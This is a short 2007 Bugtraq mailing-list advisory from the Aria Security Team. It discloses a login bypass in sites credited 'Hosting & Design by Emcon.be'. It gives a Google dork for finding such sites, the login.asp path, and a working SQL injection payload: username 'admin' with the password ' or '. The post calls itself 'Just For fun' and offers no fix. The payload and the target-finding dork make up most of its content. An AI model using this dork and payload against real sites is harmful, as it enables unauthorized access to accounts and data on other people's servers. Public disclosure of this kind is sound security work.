
Date: 18 Aug 2007 18:59:15 -0000
From: Advisory@...a-security.net
To: bugtraq@...urityfocus.com
Subject: report a bug !

### [ Aria-Security Team ] 
### Hosting & Design by Emcon.be - Web Login Bypass (SQL Injection)
##############################################################
### Credits: Sc0rpion From Aria Security Team
### Just For fun !
### Site : www.emcon.be 
### Google-D0rk: "Hosting & Design by Emcon.be "
##############################################################
### example :
### www.[site]/login.asp
### user : admin
### pass : ' or '

